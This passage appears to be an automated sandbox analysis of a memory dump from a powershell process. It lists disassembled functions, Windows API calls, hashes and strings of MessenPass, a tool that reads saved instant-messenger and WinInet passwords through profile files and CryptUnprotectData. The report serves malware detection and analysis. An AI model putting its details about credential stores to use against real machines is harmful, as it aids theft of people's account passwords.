        Function 004050C2 Relevance: .0, Instructions: 46COMMON
        Download Yara Rule
        Memory Dump Source
        • Source File: 00000011.00000002.2272649918.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_400000_powershell.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: d4540386dd2ecfa8358b54f970b731510518c9cc2a47fdc7166f1c0352bd1f31
        • Instruction ID: e46ac8c8d649937048925bbc22b10e31c7d260e61c9919193dd0f57e0586c858
        • Opcode Fuzzy Hash: d4540386dd2ecfa8358b54f970b731510518c9cc2a47fdc7166f1c0352bd1f31
        • Instruction Fuzzy Hash: 75011E326019208FA38DCE3AC80545377E3FFCA325326C1E8D845AB579D6316802CBD4
        Function 00405133 Relevance: .0, Instructions: 46COMMON
        Download Yara Rule
        Memory Dump Source
        • Source File: 00000011.00000002.2272649918.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_400000_powershell.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: cf104503c4d1f63e508e528481e2c1d582825b9df7b848c5f582128bf29b2c3b
        • Instruction ID: 1c8cf4990013556009a943ce68bbe5c533817c3d042a03847a5f6a4628de1edc
        • Opcode Fuzzy Hash: cf104503c4d1f63e508e528481e2c1d582825b9df7b848c5f582128bf29b2c3b
        • Instruction Fuzzy Hash: DA01E8326159308FA389DE3AC80144377E3FFCA32532AC1E5C945AB57DD6316847DB90
        Function 00412768 Relevance: 191.1, APIs: 8, Strings: 101, Instructions: 307stringCOMMON
        Download Yara Rule
        APIs
        • strlen.MSVCRT ref: 00412B87
        • _strncoll.MSVCRT ref: 00412B97
        • memcpy.MSVCRT ref: 00412C13
        • atoi.MSVCRT ref: 00412C24
        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000002,00000000,00000000,?,?,?,?,?,?,?,?), ref: 00412C50
        Strings
        Memory Dump Source
        • Source File: 00000011.00000002.2272649918.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_400000_powershell.jbxd
        Similarity
        • API ID: ByteCharMultiWide_strncollatoimemcpystrlen
        • String ID: AElig;$Aacute;$Acirc;$Agrave;$Aring;$Atilde;$Auml;$Ccedil;$ETH;$Eacute;$Ecirc;$Egrave;$Euml;$Iacute;$Icirc;$Igrave;$Iuml;$Ntilde;$Oacute;$Ocirc;$Ograve;$Oslash;$Otilde;$Ouml;$THORN;$Uacute;$Ucirc;$Ugrave;$Uuml;$Yacute;$aacute;$acirc;$acute;$aelig;$agrave;$amp;$apos;$aring;$atilde;$auml;$brvbar;$ccedil;$cedil;$cent;$copy;$curren;$deg;$divide;$eacute;$ecirc;$egrave;$eth;$euml;$frac12;$frac14;$frac34;$gt;$iacute;$icirc;$iexcl;$igrave;$iquest;$iuml;$laquo;$lt;$macr;$micro;$middot;$nbsp;$not;$ntilde;$oacute;$ocirc;$ograve;$ordf;$ordm;$oslash;$otilde;$ouml;$para;$plusmn;$pound;$quot;$raquo;$reg;$sect;$shy;$sup1;$sup2;$sup3;$szlig;$thorn;$times;$uacute;$ucirc;$ugrave;$uml;$uuml;$yacute;$yen;$yuml;
        • API String ID: 1864335961-3210201812
        • Opcode ID: 4454015bb34ad17b627a5be0e2725abbe23317b8734bfa8cf262dd92011da116
        • Instruction ID: 3bd07b0f0ec87f02ccef6cae80a33f2a43e47736a5c113f17b6628cc3434821e
        • Opcode Fuzzy Hash: 4454015bb34ad17b627a5be0e2725abbe23317b8734bfa8cf262dd92011da116
        • Instruction Fuzzy Hash: 3BF125B1C042989EDF25CF94C9687DDBBB1AB05308F1481CAD8596B242D7B84ECACF5C
        Function 004117B1 Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 264stringCOMMON
        Download Yara Rule
        APIs
        • GetDlgItem.USER32(?,000003E9), ref: 004117DE
        • GetDlgItem.USER32(?,000003E8), ref: 004117EA
        • GetWindowLongA.USER32(00000000,000000F0), ref: 004117F9
        • GetWindowLongA.USER32(?,000000F0), ref: 00411805
        • GetWindowLongA.USER32(00000000,000000EC), ref: 0041180E
        • GetWindowLongA.USER32(?,000000EC), ref: 0041181A
        • GetWindowRect.USER32(00000000,?), ref: 0041182C
        • GetWindowRect.USER32(?,?), ref: 00411837
        • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041184B
        • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 00411859
        • GetDC.USER32 ref: 00411892
        • strlen.MSVCRT ref: 004118D2
        • GetTextExtentPoint32A.GDI32(?,00000000,00000000,?), ref: 004118E3
        • ReleaseDC.USER32(?,?), ref: 00411930
        • sprintf.MSVCRT ref: 004119F0
        • SetWindowTextA.USER32(?,?), ref: 00411A04
        • SetWindowTextA.USER32(?,00000000), ref: 00411A22
        • GetDlgItem.USER32(?,00000001), ref: 00411A58
        • GetWindowRect.USER32(00000000,?), ref: 00411A68
        • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 00411A76
        • GetClientRect.USER32(?,?), ref: 00411A8D
        • GetWindowRect.USER32(?,?), ref: 00411A97
        • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 00411ADD
        • GetClientRect.USER32(?,?), ref: 00411AE7
        • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 00411B1F
        Strings
        Memory Dump Source
        • Source File: 00000011.00000002.2272649918.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_400000_powershell.jbxd
        Similarity
        • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Releasesprintfstrlen
        • String ID: %s:$EDIT$STATIC
        • API String ID: 1703216249-3046471546
        • Opcode ID: aed0d2fc460153e712b5f87657be857b759c42e44ee73449b635be24a1b57749
        • Instruction ID: b52727e0d403183305b875c614282f55299ec8bf2f46e0c3c56b37a88aeefe3f
        • Opcode Fuzzy Hash: aed0d2fc460153e712b5f87657be857b759c42e44ee73449b635be24a1b57749
        • Instruction Fuzzy Hash: B2B1DF72108341AFD711DF68C985AABBBE9FF88704F00492DFA9993261DB75E904CF16
        Function 004105A6 Relevance: 42.2, APIs: 22, Strings: 2, Instructions: 213windowCOMMON
        Download Yara Rule
        APIs
        • EndDialog.USER32(?,?), ref: 004105EE
        • GetDlgItem.USER32(?,000003EA), ref: 00410606
        • SendMessageA.USER32(00000000,000000B1,00000000,0000FFFF), ref: 00410625
        • SendMessageA.USER32(?,00000301,00000000,00000000), ref: 00410632
        • SendMessageA.USER32(?,000000B1,00000000,00000000), ref: 0041063B
        • memset.MSVCRT ref: 00410663
        • memset.MSVCRT ref: 00410683
        • memset.MSVCRT ref: 004106A1
        • memset.MSVCRT ref: 004106BA
        • memset.MSVCRT ref: 004106D8
        • memset.MSVCRT ref: 004106F1
        • GetCurrentProcess.KERNEL32 ref: 004106F9
        • ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0041071E
        • ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 00410754
        • memset.MSVCRT ref: 0041078F
        • GetCurrentProcessId.KERNEL32 ref: 0041079D
        • memcpy.MSVCRT ref: 004107CC
        • _mbscpy.MSVCRT ref: 004107EE
        • sprintf.MSVCRT ref: 00410859
        • SetDlgItemTextA.USER32(?,000003EA,?), ref: 00410872
        • GetDlgItem.USER32(?,000003EA), ref: 0041087C
        • SetFocus.USER32(00000000), ref: 00410883
        Strings
        • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X ESP=%8.8XEIP=%8.8XStack Data: %sCode Data: %s, xrefs: 00410853
        • {Unknown}, xrefs: 00410668
        Memory Dump Source
        • Source File: 00000011.00000002.2272649918.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_400000_powershell.jbxd
        Similarity
        • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_mbscpymemcpysprintf
        • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X ESP=%8.8XEIP=%8.8XStack Data: %sCode Data: %s${Unknown}
        • API String ID: 1428123949-3474136107
        • Opcode ID: dfc1cacd1db7b3e5e31f88e82e27deeb72c9f49ab4d69ff4c670fff32b5d8099
        • Instruction ID: 62e2ad0b84330276400548424eb425e056568d51af16bfff45d60a010caf4195
        • Opcode Fuzzy Hash: dfc1cacd1db7b3e5e31f88e82e27deeb72c9f49ab4d69ff4c670fff32b5d8099
        • Instruction Fuzzy Hash: 1D7108B2804248FFD721DF51EC45EDB7BACEF48344F04443EF54892160EA759A94CBA9
        Function 0040B4F6 Relevance: 37.0, APIs: 14, Strings: 7, Instructions: 286windowregistrystringCOMMON
        Download Yara Rule
        APIs
          • Part of subcall function 00408A29: LoadMenuA.USER32(00000000), ref: 00408A31
          • Part of subcall function 00408A29: sprintf.MSVCRT ref: 00408A54
        • SetMenu.USER32(?,00000000), ref: 0040B61C
        • SendMessageA.USER32(00000000,00000404,00000001,?), ref: 0040B64F
        • LoadImageA.USER32(00000068,00000000,00000000,00000000,00009060), ref: 0040B667
        • CreateWindowExA.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000), ref: 0040B6C7
        • _strcmpi.MSVCRT ref: 0040B799
        • RegDeleteKeyA.ADVAPI32(80000001,Software\NirSoft\MessenPass), ref: 0040B7AE
        • SetFocus.USER32(?), ref: 0040B7E1
        • GetFileAttributesA.KERNEL32(0041E678), ref: 0040B7FB
        • GetTempPathA.KERNEL32(00000104,0041E678), ref: 0040B80B
        • strlen.MSVCRT ref: 0040B812
        • strlen.MSVCRT ref: 0040B820
        • RegisterClipboardFormatA.USER32(commdlg_FindReplace), ref: 0040B86D
          • Part of subcall function 00404E68: strlen.MSVCRT ref: 00404E85
          • Part of subcall function 00404E68: SendMessageA.USER32(00000000,0000101B,00000000,?), ref: 00404EA9
        • SendMessageA.USER32(?,00000404,00000002,?), ref: 0040B8DD
        • SendMessageA.USER32(?,00000401,00001001,00000000), ref: 0040B8F0
        Strings
        Memory Dump Source
        • Source File: 00000011.00000002.2272649918.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_400000_powershell.jbxd
        Similarity
        • API ID: MessageSend$strlen$LoadMenu$AttributesClipboardCreateDeleteFileFocusFormatImagePathRegisterTempWindow_strcmpisprintf
        • String ID: /noloadsettings$/sm$Software\NirSoft\MessenPass$SysListView32$commdlg_FindReplace$report.html$xA
        • API String ID: 2862451953-132385428
        • Opcode ID: ea6126f0ad9a3bdd701ee80c8346164e4811f452d9b02224669d18572419d2bb
        • Instruction ID: 58ee6bec69cc5a2ead352e1dc17fbc33d0493dc4f48ef93b1c15430ab04c662e
        • Opcode Fuzzy Hash: ea6126f0ad9a3bdd701ee80c8346164e4811f452d9b02224669d18572419d2bb
        • Instruction Fuzzy Hash: 4FC1F271500244EFEB129F64C84ABDA7FA5EF54708F04407EFA446F2D2CBB95944CBA9
        Function 0040F689 Relevance: 35.2, APIs: 12, Strings: 8, Instructions: 192COMMON
        Download Yara Rule
        APIs
          • Part of subcall function 0040F94E: SetFilePointer.KERNEL32(0040F292,?,00000000,00000000,00418AF8,00000000,?,?,0040F8C4,?,00000000,?,76232EE0), ref: 0040F968
          • Part of subcall function 0040F94E: memset.MSVCRT ref: 0040F973
        • _strcmpi.MSVCRT ref: 0040F729
        • _strcmpi.MSVCRT ref: 0040F740
        • _strcmpi.MSVCRT ref: 0040F757
        • _strcmpi.MSVCRT ref: 0040F76E
        • _strcmpi.MSVCRT ref: 0040F792
        • _strcmpi.MSVCRT ref: 0040F7A6
        • _strcmpi.MSVCRT ref: 0040F7BA
        • _strcmpi.MSVCRT ref: 0040F7CE
        • _strcmpi.MSVCRT ref: 0040F7E2
        • _mbscpy.MSVCRT ref: 0040F831
        • _strcmpi.MSVCRT ref: 0040F843
        • _mbscpy.MSVCRT ref: 0040F88E
        Strings
        Memory Dump Source
        • Source File: 00000011.00000002.2272649918.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_400000_powershell.jbxd
        Similarity
        • API ID: _strcmpi$_mbscpy$FilePointermemset
        • String ID: LoginName$UIN$e-mail$gg_1$icq$icq_1$password$yahoo_id
        • API String ID: 3770779768-1670397801
        • Opcode ID: 35a2a10a4a641d2086cb2dbdba6566c00143c3982c3012e31156ad73f44fce61
        • Instruction ID: 0cc2e13a8e56b2c188e74045540a3fe2ab2ea4ed6cca8b10f1d7ecee0d286665
        • Opcode Fuzzy Hash: 35a2a10a4a641d2086cb2dbdba6566c00143c3982c3012e31156ad73f44fce61
        • Instruction Fuzzy Hash: 795177725043096EEB21DAA2DC81EEA73AC9F04715F60447FF505E25C1EB38EB89879D
        Function 0040244D Relevance: 33.4, APIs: 7, Strings: 12, Instructions: 132COMMON
        Download Yara Rule
        APIs
        • memset.MSVCRT ref: 0040246E
        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000400,00000000,00000000), ref: 0040248C
          • Part of subcall function 004029D9: strlen.MSVCRT ref: 004029E6
        • ??2@YAPAXI@Z.MSVCRT ref: 004024B9
        • ??2@YAPAXI@Z.MSVCRT ref: 004024C8
        • memcpy.MSVCRT ref: 004025B4
        • ??3@YAXPAX@Z.MSVCRT ref: 004025F4
        • ??3@YAXPAX@Z.MSVCRT ref: 004025FC
        Strings
        Memory Dump Source
        • Source File: 00000011.00000002.2272649918.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_400000_powershell.jbxd
        Similarity
        • API ID: ??2@??3@$ByteCharMultiWidememcpymemsetstrlen
        • String ID: '$)$)$0$5$:$G$W$X$[$[$f
        • API String ID: 3606715663-4187034442
        • Opcode ID: 0c1ead281ec529b2204c21758b478f212f128851a43b0ebebe7386bd97e06504
        • Instruction ID: d66295c9476db63dbc5c32b0f61e30ac1af87f583ef6fa4ed04bb8f7da70bc00
        • Opcode Fuzzy Hash: 0c1ead281ec529b2204c21758b478f212f128851a43b0ebebe7386bd97e06504
        • Instruction Fuzzy Hash: 98514C218087CEDDDB22D7BC98486DEBF745F26224F0843D9E1E47B2D2D265064AC77A
        Function 0040E0A1 Relevance: 31.6, APIs: 12, Strings: 6, Instructions: 142stringCOMMON
        Download Yara Rule
        APIs
        • memset.MSVCRT ref: 0040E0C7
        • strlen.MSVCRT ref: 0040E0CF
        • strlen.MSVCRT ref: 0040E0DB
        • GetPrivateProfileIntA.KERNEL32(Accounts,num,00000000,?), ref: 0040E11A
        • memset.MSVCRT ref: 0040E146
        • memset.MSVCRT ref: 0040E15A
        • memset.MSVCRT ref: 0040E16E
        • memset.MSVCRT ref: 0040E182
        • memset.MSVCRT ref: 0040E196
        • sprintf.MSVCRT ref: 0040E1AA
        • GetPrivateProfileStringA.KERNEL32(?,Account,00417C88,?,000003FF,?), ref: 0040E1D8
        • GetPrivateProfileStringA.KERNEL32(?,Password,00417C88,?,000003FF,?), ref: 0040E1FA
          • Part of subcall function 00406B4B: _mbscpy.MSVCRT ref: 00406B53
          • Part of subcall function 00406B4B: _mbscat.MSVCRT ref: 00406B62
        Strings
        Memory Dump Source
        • Source File: 00000011.00000002.2272649918.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_400000_powershell.jbxd
        Similarity
        • API ID: memset$PrivateProfile$Stringstrlen$_mbscat_mbscpysprintf
        • String ID: Account$Account%3.3d$Accounts$Password$accounts.ini$num
        • API String ID: 1850607429-3672167483
        • Opcode ID: 574f83c5b41ac8dd83ff1764a4dea53749887e014cb38c5e2b2be6ead15973e1
        • Instruction ID: 3695b6fee04a76e8e88970007e36b309292cfce1d28ac10fc6c7acbfdb1ec453
        • Opcode Fuzzy Hash: 574f83c5b41ac8dd83ff1764a4dea53749887e014cb38c5e2b2be6ead15973e1
        • Instruction Fuzzy Hash: A25193B184026CBECB10DB54DC86EDA77BCAF55304F1044FAB508E3141DA789FC98BA4
        Function 0040EE6A Relevance: 31.6, APIs: 11, Strings: 10, Instructions: 127COMMON
        Download Yara Rule
        APIs
        Strings
        Memory Dump Source
        • Source File: 00000011.00000002.2272649918.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_400000_powershell.jbxd
        Similarity
        • API ID: _strcmpi
        • String ID: aim$aim_1$gg_1$icq$icq_1$jabber$jabber_1$msn$msn_1$yahoo
        • API String ID: 1439213657-55676784
        • Opcode ID: e5345bd8614f8dcd2d1c308e40a1d6c5d5934fe6eb63f7ee50686fc0058a6628
        • Instruction ID: d6ea28dcef1c43b6611216e97a84ccd45a66baff8fdfae9b3007c4cad2cc92f3
        • Opcode Fuzzy Hash: e5345bd8614f8dcd2d1c308e40a1d6c5d5934fe6eb63f7ee50686fc0058a6628
        • Instruction Fuzzy Hash: 2F31307324E3127AF714B9336D02BEB27898F11B66F24082FFA09B11C1EE7D5A55419E
        Function 004124D4 Relevance: 31.6, APIs: 12, Strings: 6, Instructions: 101COMMON
        Download Yara Rule
        APIs
        Strings
        Memory Dump Source
        • Source File: 00000011.00000002.2272649918.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_400000_powershell.jbxd
        Similarity
        • API ID: _mbscat$memsetsprintf$_mbscpy
        • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
        • API String ID: 633282248-1996832678
        • Opcode ID: 011dc5066fb19440f4804de798d1f4ec702ddfa9614fe7101a4430c164161ab3
        • Instruction ID: 0d87bc4a3c90cd549b7ee136a842ac2d8ae4f17c90590582d174715666fd6da4
        • Opcode Fuzzy Hash: 011dc5066fb19440f4804de798d1f4ec702ddfa9614fe7101a4430c164161ab3
        • Instruction Fuzzy Hash: CB31C7B2801215BEDB10AE549D939CAF76CAF10315F1441AFF514B2181EABC9FD08BAD
        Function 0040A242 Relevance: 29.9, APIs: 10, Strings: 7, Instructions: 182COMMON
        Download Yara Rule
        APIs
        Strings
        Memory Dump Source
        • Source File: 00000011.00000002.2272649918.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_400000_powershell.jbxd
        Similarity
        • API ID: memsetsprintf$_mbscpy$FileWrite_mbscatstrlen
        • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
        • API String ID: 710961058-601624466
        • Opcode ID: 01ba515a634d510913fe2f235f109e28ad47b200226b44b89f882b7dae9418f4
        • Instruction ID: 690333ed3326df0f6eed54148ed3e596883a3b3feedda5c4c7dc15c04e40e9a4
        • Opcode Fuzzy Hash: 01ba515a634d510913fe2f235f109e28ad47b200226b44b89f882b7dae9418f4
        • Instruction Fuzzy Hash: 5B61AE31900208AFDF14DF54CC86EDE7B79EF08314F1001AAF909AB1D2DB799A94CB55
        Function 0040DD65 Relevance: 28.2, APIs: 13, Strings: 3, Instructions: 178stringCOMMON
        Download Yara Rule
        APIs
        • memset.MSVCRT ref: 0040DD8B
        • strlen.MSVCRT ref: 0040DD93
        • strlen.MSVCRT ref: 0040DD9D
        • memset.MSVCRT ref: 0040DDEB
        • memset.MSVCRT ref: 0040DDF9
        • memset.MSVCRT ref: 0040DE07
        • memset.MSVCRT ref: 0040DE1F
        • sprintf.MSVCRT ref: 0040DE46
        • GetPrivateProfileStringA.KERNEL32(?,name,00417C88,?,000003FF,?), ref: 0040DE74
        • GetPrivateProfileStringA.KERNEL32(?,password,00417C88,?,000003FF,?), ref: 0040DE96
          • Part of subcall function 00406B4B: _mbscpy.MSVCRT ref: 00406B53
          • Part of subcall function 00406B4B: _mbscat.MSVCRT ref: 00406B62
        • sprintf.MSVCRT ref: 0040DF73
        • GetPrivateProfileStringA.KERNEL32(?,name,00417C88,?,000003FF,?), ref: 0040DFA2
        • GetPrivateProfileStringA.KERNEL32(?,password,00417C88,?,000003FF,?), ref: 0040DFC0
        Strings
        Memory Dump Source
        • Source File: 00000011.00000002.2272649918.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_400000_powershell.jbxd
        Similarity
        • API ID: memset$PrivateProfileString$sprintfstrlen$_mbscat_mbscpy
        • String ID: name$password$profile %d
        • API String ID: 3544386798-2462908242
        • Opcode ID: e7b187a0626f75cc39379d2bba276785f1ae62edefe99cb3f3bfbc37819d7c60
        • Instruction ID: 9e46ac0295d5b354e730bb81602d93da8fcedc4e5bf25204c2bd197169999166
        • Opcode Fuzzy Hash: e7b187a0626f75cc39379d2bba276785f1ae62edefe99cb3f3bfbc37819d7c60
        • Instruction Fuzzy Hash: DA61A5B284425DAEDB20DB54DC40FDA77BCAF15304F1444EAA559E3141DBB89FC88FA4
        Function 004125F1 Relevance: 28.1, APIs: 10, Strings: 6, Instructions: 114COMMON
        Download Yara Rule
        APIs
        Strings
        Memory Dump Source
        • Source File: 00000011.00000002.2272649918.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_400000_powershell.jbxd
        Similarity
        • API ID: sprintf$memset$_mbscpy
        • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
        • API String ID: 3402215030-3842416460
        • Opcode ID: ea06b0d74ada23c5ef34a7984231b84acf2e1d6cd6bcfe81b43f4a3791556408
        • Instruction ID: a5bfc8ec8e60557daa4b034ce7241d6b1778398f1e76627a293d7ac05c42f781
        • Opcode Fuzzy Hash: ea06b0d74ada23c5ef34a7984231b84acf2e1d6cd6bcfe81b43f4a3791556408
        • Instruction Fuzzy Hash: D24173B280121DBADB21EE54DC45FEB776CAF14309F0400ABF518E2142E6789FD88BA5
        Function 004010D0 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 111COMMON
        Download Yara Rule
        APIs
        • GetDlgItem.USER32(?,000003EC), ref: 00401118
        • ChildWindowFromPoint.USER32(?,?,?), ref: 00401126
          • Part of subcall function 00406D6B: ShellExecuteA.SHELL32(?,open,?,00417C88,00417C88,00000005), ref: 00406D81
        • GetDlgItem.USER32(?,000003EC), ref: 00401161
        • ChildWindowFromPoint.USER32(?,?,?), ref: 0040116F
        • LoadCursorA.USER32(00000067), ref: 00401186
        • SetCursor.USER32(00000000,?,?), ref: 0040118D
        • GetDlgItem.USER32(?,000003EC), ref: 0040119D
        • SetBkMode.GDI32(?,00000001), ref: 004011B1
        • SetTextColor.GDI32(?,00C00000), ref: 004011BF
        • GetSysColorBrush.USER32(0000000F), ref: 004011C7
        • EndDialog.USER32(?,00000001), ref: 004011E5
        • DeleteObject.GDI32(?), ref: 004011F1
        • SetWindowTextA.USER32(?,MessenPass), ref: 00401204
        • SetDlgItemTextA.USER32(?,000003EA,?), ref: 0040121C
        • SetDlgItemTextA.USER32(?,000003EC,?), ref: 0040122D
        Strings
        Memory Dump Source
        • Source File: 00000011.00000002.2272649918.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_400000_powershell.jbxd
        Similarity
        • API ID: Item$Text$Window$ChildColorCursorFromPoint$BrushDeleteDialogExecuteLoadModeObjectShell
        • String ID: MessenPass
        • API String ID: 2410034309-1347981195
        • Opcode ID: 843b1ff313390d25d34e2be648776c3666369c8dad7882cf094c1c7715f69dbe
        • Instruction ID: 61c274a33cdd550ae885db2c0d410d86e96b4f8b628e001bd40ef85afa118776
        • Opcode Fuzzy Hash: 843b1ff313390d25d34e2be648776c3666369c8dad7882cf094c1c7715f69dbe
        • Instruction Fuzzy Hash: 6D31D271500A4AFBDB026FA0DD49EEABB7AFB44301F508236F915E61B0C7759861DB88
        Function 0040C50E Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 70COMMON
        Download Yara Rule
        APIs
        Strings
        Memory Dump Source
        • Source File: 00000011.00000002.2272649918.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_400000_powershell.jbxd
        Similarity
        • API ID: _strcmpi
        • String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
        • API String ID: 1439213657-1959339147
        • Opcode ID: 42829d603ed6219f05e00acd70f5009b327ef2ea2f3e71e7fd8bced316a66bba
        • Instruction ID: dd15bb3cc8bdf641e1a17555e2464251a39e176c696be1a009fdff25c7df10cc
        • Opcode Fuzzy Hash: 42829d603ed6219f05e00acd70f5009b327ef2ea2f3e71e7fd8bced316a66bba
        • Instruction Fuzzy Hash: DE011AB229A32178F9286A773C07BD70A488B51F7BF70065FF408E40C1FE5C968054AD
        Function 00404D18 Relevance: 24.5, APIs: 7, Strings: 7, Instructions: 33libraryloaderCOMMON
        Download Yara Rule
        APIs
        • LoadLibraryA.KERNEL32(advapi32.dll,?,004084A6), ref: 00404D23
        • GetProcAddress.KERNEL32(00000000,CryptAcquireContextA), ref: 00404D37
        • GetProcAddress.KERNEL32(?,CryptReleaseContext), ref: 00404D43
        • GetProcAddress.KERNEL32(?,CryptCreateHash), ref: 00404D4F
        • GetProcAddress.KERNEL32(?,CryptGetHashParam), ref: 00404D5B
        • GetProcAddress.KERNEL32(?,CryptHashData), ref: 00404D67
        • GetProcAddress.KERNEL32(?,CryptDestroyHash), ref: 00404D73
        Strings
        Memory Dump Source
        • Source File: 00000011.00000002.2272649918.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_400000_powershell.jbxd
        Similarity
        • API ID: AddressProc$LibraryLoad
        • String ID: CryptAcquireContextA$CryptCreateHash$CryptDestroyHash$CryptGetHashParam$CryptHashData$CryptReleaseContext$advapi32.dll
        • API String ID: 2238633743-1621422469
        • Opcode ID: 11447201b65d866f37edbf99505d086a0ab8926e77609814987dd4a6320f0436
        • Instruction ID: 844867562ca0833f301e0ac6fd14d3db62e181894ebadeef568166b0b2be0524
        • Opcode Fuzzy Hash: 11447201b65d866f37edbf99505d086a0ab8926e77609814987dd4a6320f0436
        • Instruction Fuzzy Hash: 4FF09774940B48AECB30AF759C09E86BEE1EF9C7007224D2EE2C553650DA799084CE88
        Function 00404578 Relevance: 23.0, APIs: 11, Strings: 2, Instructions: 240COMMON
        Download Yara Rule
        APIs
        • wcslen.MSVCRT ref: 0040459A
        • memset.MSVCRT ref: 004045BA
        • wcschr.MSVCRT ref: 0040464E
        • _wcsncoll.MSVCRT ref: 00404667
        • memcpy.MSVCRT ref: 00404700
        • wcschr.MSVCRT ref: 00404714
        • wcscpy.MSVCRT ref: 0040472B
        • memcpy.MSVCRT ref: 004047E3
        • LocalFree.KERNEL32(?,?,?,?,?,?), ref: 004047F5
        • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 0040473C
          • Part of subcall function 00404CE0: FreeLibrary.KERNELBASE(?,00404CA5,00000000,00404771,?,?), ref: 00404CEB
        • memcpy.MSVCRT ref: 0040483B
          • Part of subcall function 00404C9D: LoadLibraryA.KERNELBASE(crypt32.dll,00000000,00404771,?,?), ref: 00404CAA
          • Part of subcall function 00404C9D: GetProcAddress.KERNEL32(00000000,CryptUnprotectData), ref: 00404CBC
        Strings
        Memory Dump Source
        • Source File: 00000011.00000002.2272649918.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_400000_powershell.jbxd
        Similarity
        • API ID: Freememcpy$LibraryLocalwcschr$AddressLoadProc_wcsncollmemsetwcscpywcslen
        • String ID: ?L@$Microsoft_WinInet
        • API String ID: 1802959924-2674056311
        • Opcode ID: fe56d977aabb073792e25c405abe676263accf88416be629dc76c317c79dc49e
        • Instruction ID: 38d9b8d34b298c31677a0e9ec7c60157448ec74f6fc12d2487dcaf445e5773ed
        • Opcode Fuzzy Hash: fe56d977aabb073792e25c405abe676263accf88416be629dc76c317c79dc49e
        • Instruction Fuzzy Hash: 7FA16DB6D002199BDF10DFA5D844AEEB7B8FF44304F00846BEA19F7281E7789A45CB95
        Function 004137CE Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 202stringCOMMON
        Download Yara Rule
        APIs
        • memset.MSVCRT ref: 004137F3
          • Part of subcall function 00413646: strlen.MSVCRT ref: 00413653
        • strlen.MSVCRT ref: 0041380F
        • memset.MSVCRT ref: 00413849
